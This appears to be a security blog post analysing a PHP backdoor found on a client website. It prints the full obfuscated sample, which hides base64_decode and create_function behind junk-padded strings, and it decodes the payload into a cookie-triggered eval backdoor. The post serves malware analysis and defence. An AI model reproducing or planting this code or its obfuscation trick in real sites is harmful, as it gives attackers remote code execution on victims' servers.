We found another interesting piece of PHP-based malware on a client site a few days ago:
$exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM";
$iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk";
$ts = str_replace("b","","bsbtr_brbepblabcbe");
$fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=";
$sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc";
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere");
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn");
$tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha();Can you decode and see what it is doing? ..
This piece of code tries to obfuscate all the functions that could be flagged by a scanner using a benign php function called str_replace. This function replaces all instances of a string with a replacement in the subject. So, for example, the next line:
----- $ts = str_replace("b","","bsbtr_brbepblabcbe"); ----- Replaces all instances of character \’b\’ with nothing. So from bsbtr_brbepblabcbe we get str_replace. Using the same technique, we have some more functions:
----- $dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); //base64_decode $mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); //create_function ----- All this for creating a function and running it in this line:
----- $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); ----- Function code is contained in the next expression:
----- $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy)); ----- And the final code is:
$c = "count";
$a = $_COOKIE;
if (reset($a) == 'mh' && $c($a) > 3) {
$k = 'ute4m';
echo '<' . $k . '>';
eval (base64_decode (preg_replace(array(
'/[^\w=\s]/',
'/\s/'
), array(
'',
'+'
), join(array_slice($a, $c($a) - 3)))));
echo '</' . $k . '>';
}What it does? It uses some simple tricks to edit the contents of the cookie, decode it from base64 and eval (execute) that malicious code.
